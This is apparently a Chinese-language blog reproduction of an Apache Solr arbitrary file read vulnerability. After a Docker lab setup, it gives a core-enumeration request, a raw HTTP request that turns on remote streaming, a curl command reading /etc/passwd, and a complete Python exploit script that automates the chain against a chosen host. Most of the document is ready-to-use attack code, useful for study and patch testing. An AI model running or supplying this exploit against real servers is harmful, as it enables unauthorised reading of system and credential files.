Apache-Solr 任意文件读取漏洞复现

使用Docker

 docker pull solr
 docker run --name solr2 -d -p 8081:8983 solr

然后进入容器

#如果不把这块放进去新建core 的时候会报错的
cd /opt/solr-8.7.0/server/solr/configsets/_default
mkdir /var/solr/data/new_core
cp -r conf  /var/solr/data/new_core

关闭容器。 并重启；
docker stop a6d76241265f
docker start a6d76241265f

然后进行测试

首先获取core

http://192.168.1.79:8081/solr/admin/cores?indexInfo=false&wt=json

这里可以获取很多核心。我只用new_core 作为测试

POST /solr/new_core/config HTTP/1.1
Host: 192.168.1.79:8081
Content-Length: 80
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/json
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

读取文件

curl "http://192.168.1.79:8081/solr/new_core/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd" 

exp:

#!/usr/bin/python
# coding: UTF-8
import requests

host="http://192.168.1.79:8081/"
if host[-1]=='/':
    host=host[:-1]
def get_core(host):
    url=host+'/solr/admin/cores?indexInfo=false&wt=json'
    core_data=requests.get(url,timeout=3).json()
    if core_data['status']:
        core=core_data['status'].keys()[0]
        jsonp_data={"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":'true'}}
        requests.post(url=host+"/solr/%s/config"%core,json=jsonp_data)

        result_data=requests.post(url=host+'/solr/%s/debug/dump?param=ContentStreams'%core,data={"stream.url":"file:///etc/passwd"}).json()
        if result_data['streams']:
            print result_data['streams'][0]['stream']
    else:
        exit("不存在此漏洞")
get_core(host)